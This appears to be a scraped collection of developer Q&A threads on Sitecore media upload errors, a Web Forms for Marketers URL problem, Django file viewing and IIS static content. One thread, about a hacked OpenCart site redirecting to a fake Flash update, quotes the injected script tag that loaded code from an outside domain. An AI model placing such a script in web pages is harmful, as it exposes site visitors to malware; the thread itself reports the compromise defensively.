One or more files could not be uploaded. See the Log file for more details in sitecore 7.1 - sitecore

I get this "One or more files could not be uploaded. See the Log file for more details." error when i tried to upload an image file using firefox browser. In other browsers (IE and Chrome), it works fine. I checked whether WebDav.config causing the issue and i removed this config but didn't help. Also, I checked the anonymous access on Applications/FlashUpload and /Applications/Media.
Does anyone encountered this scenario?
May i know what is the cause.
Sitecore version : sitecore 7.1
Firefox 27.0.1
Thanks,
Mohan

Please try modifying the following settings:
<setting name="Upload.Classic" value="true" />

answer from user459491 will solve the problem, but it simply changes the controls used for file downloads. I had same issue and the reason was that our website used windows authentication and asp.net authentication. The solution is explained here:
http://maesitus-sitecore.blogspot.co.uk/2011/04/sitecore-media-upload-is-not-working.html
"I have then lodged a ticket with Sitecore support. Few days later they come back with a solution that is to enable "Anonymous" authentication in IIS for ‘/sitecore/shell/Applications/FlashUpload’ and ‘/sitecore/shell/Applications/Media’."

Can't remove a "security" folder from the server via FTP

I currently host a website on Hostgator. My site redirects to an Adobe Flash Update automatically. I contacted support at Hostgator and they did not want to help, they said I need to contact sitelock to remove the malware is causing the redirection.
I ftp in to the server and found there is a ".security" folder which seems to be the cause of the problem. It has some zip files and other php files. I cannot change its permissions nor delete it.
Does anyone knows how can I remove this malware from the server? Any help is welcome thank you.
In reference to my last issue with Hostgator and a Malware site.
The site was running OpenCart and I found that the origin of the problem was within the back end of OpenCart, specifically under Settings > Server > Google Analytics Code with a suspicious domain in the text area.
`<!-- startgoogle -->
<script src="http://nam.su/google2"></script>
<!-- endgoogle --></head>`
Whoever did this to the site was able to login and manually enter the script in the poorly escaped and sanitize text area. Therefore making a mess. I just hope that I don't get banned from this site for publishing the link above but I think that someone may come across a similar problem and find this 'honest' mistake, useful. I am also interested in what's wrong with OpenCart's textarea.

Can't Open Web forms for marketers Form Designer or Security Manager

I have had WFFM running on a Sitecore instance for a while, but it has recently stopped working. When I go to "Form Designer" on an existing form, I get the standard Sitecore "The requested document was not found" page.
Requested URL: /applications/modules/web
User Name: sitecore\admin
Site Name: shell
If the page you are trying to display exists, please check that an
appropriate prefix has been added to the IgnoreUrlPrefixes setting in
the web.config.
Note that the requested URL is stated as /applications/modules/web instead of /applications/modules/web forms for marketers.
A lot of development has occurred on this site recently, so I'm not sure when exactly this started happening.
Additional: info:
Folder and file permissions are correct.
I've tried reinstalling the WFFM package, and made sure that all the files are in place.
Several processors have been added to the HttpBeginRequest pipeline, but I removed them all to test if they were the cause - they weren't.
I haven't upgraded Sitecore since WFFM was working and the version is correct.
No errors are logged
EDIT
This also seems to be affecting the Sitecore Security Editor:
Requested URL: /appl
User Name: sitecore\admin
Site Name: shell
If the page you are trying to display exists, please check that an
appropriate prefix has been added to the IgnoreUrlPrefixes setting in
the web.config.
EDIT 2
Further investigation with this is making me think it is related to the Requested URL. I originally thought the the "Not found" page was displaying the requested url incorrectly. However, if I attempt to goto mysite.com/sitecore/shell/applications/fake folder with spaces/fake page with spaces I get this error message:
Requested URL: /applications/fake folder with spaces/fake page with
spaces
User Name: sitecore\admin
Site Name: shell
If the page you are trying to display exists, please check that an
appropriate prefix has been added to the IgnoreUrlPrefixes setting in
the web.config.
As you can see the Requested Url is correct in the error message. So in relation to my problem, I think maybe Sitecore is requesting the wrong URL in the first place.
Additionally if I go to the go the following url by typing directly into the browser, then the Security Editor opens as expected:
mysite.com/sitecore/shell/Applications/Security/User-Editor
This is quite old now but I thought I'd provide an update for anyone else who encounters the problem.
Unfortunately, Sitecore support weren't able to help beyond pointing out that setting the addAspxExtension attribute to 'true' in the link provider seemed to solve the problem. This may have been acceptable except that extensionless URLs were important to the customer.
In the end I had to amend my link provider so that addAspxExtension is set to 'true' in the web config, and then I set it to false inside the GetItemUrl method for specified sites only.
So now whenever the context site is 'Shell' or 'Admin' etc, the extensions are added by default, but switched off in my main website.
Of course, this is a work around. I still don't know how to actually fix the problem
So the first thing that I am going to tell you is that I suspect that there is something wrong with your site declaration for Sitecore Modules. In your web.config, there's a site declaration for "modules_shell" and "modules_website". Those are where the code files that run the modules are usually located... a shell folder to run the parts that run in the Sitecore shell and a web folder to run the part that is accessed by the externally facing site. Please check your site declarations (and the form.config file) to make sure that you're not in live mode or something like that. I would definitely say that this is where you should start looking.
The next thing is to say that your comments about Sitecore not serving a url in the /sitecore/shell directory is really not surprising. Sitecore processes all requests unless you specifically tell it to ignore requests (like setting it in the IgnoreUrlPrefixes in web.config), it's going to try processing it. Like going to /sitecore/shell/applications gives me a layout error because it doesn't have anything set to handle that request. Now your error suggests that there is something wrong with Site declarations.. however, even if they were all right, it still wouldn't work.

Django Online File Browser

everyone:
Recently,I meet a problem when I'm using Django to devlope my site.
In my project, one requirement is to view file online.
That is to say, one can browses files of formats:pdf, jpeg, doc and so on
directly in browsers such as chrome or firefox and so on.
I know this can be done by flash,FlexPaper is one solution. But in django,
not in flash,is there any other solutions? Anyone knows that? If not, I can
only use flexpaper and maybe site can't be accessed via apple devices
Many thanks!!
I think, you can use https://github.com/NetAngels/django-webodt (documentation) with option inline=True:
render_to_response(..., inline=True)
There are plenty of non-flash file browser plugins out there: Elfinder has a Django connector, and you can probably get an integration with CKfinder.
The django packages page also has a list of django file browsers link.

CF10 developer on IIS7.5 / WIN7 - CFM files run ok - but can't see .GIFs

Can anyone help with this strange problem.
I have just installed CF10 developer on Win7 which is using IIS7.5.
Installation went smooth, and can browse .cfm files no problem and connect to datasources no problem .. BUT: even though I can browse all my local cf sites, none of the sites will display images or styles for external .CSS files.
So, I get the site, content from the database, and all the functionality of cfm files being parsed OK, but no styles and no images.
If I browse directly (pasting the filepath in the browser) to one of the images I get a 404 error - file not found - even though the .gif file does indeed exist in the directory.
So, basically, I can run CFM files, and browse a local site built in coldfusion, but none of the images or externally referenced css files will be "found" by the browser/IIS.
Can anyone help?
Thanks in advance if someone can..
Sounds like an issue with those mimetypes, please see the following for information on installing the static content role to IIS and enabling those mimetypes to be served.
No Mime Types Option in IIS 7
Be sure to enable static content in IIS 7.
Had two occurrences of this problem lately.
See here:
http://weblogs.asp.net/anasghanem/archive/2008/05/23/don-t-forget-to-check-quot-static-content-service-quot-in-iis7-installation.aspx
Try restarting the IIS server. Close all browsers and restart.
You need to determine if it is a CF issue or an IIS issue. Try the following:
Check to see if this is an issue with images not being served vs broken paths to the images. There may be CFML code that is creating links to invalid locations.
If the locations are valid then it would be an issue with IIS not server image files.
Also check to see if there is a similar issue with JPEG and PNG files. If JPEGs and PNGs show up, this suggests an IIS issue.
Also try creating a simple HTML page that has an image on it. If it has an image on it, this suggests a CF issue

Sitecore Media Library upload error

I am a newbie to Sitecore 6.4.
I tried to upload an image to Media Library/Images. However, the system always tells me "One or more files could not be uploaded. See the Log file for more details.".
The error message is "IOErrorEvent type="IOError" bubbles=false cancelable=false eventPhase=2 text="Error #2038"
I've assigned all the permission to sitecore\Admin, default\Anonymous, extranet\Anonymous.
Did I miss anything?
I checked the log folder under my sitecore site. There is a file called WebDAV.log.*.txt.
Inside the file, it said:
"WebDAV feature is supported for Internet Explorer browser only."
Then I switched to IE9, it works.
There appears to be a fix apparently from the Sitecore team that involves enabling "'Anonymous' authentication in IIS for ‘/sitecore/shell/Applications/FlashUpload’ and ‘/sitecore/shell/Applications/Media’."
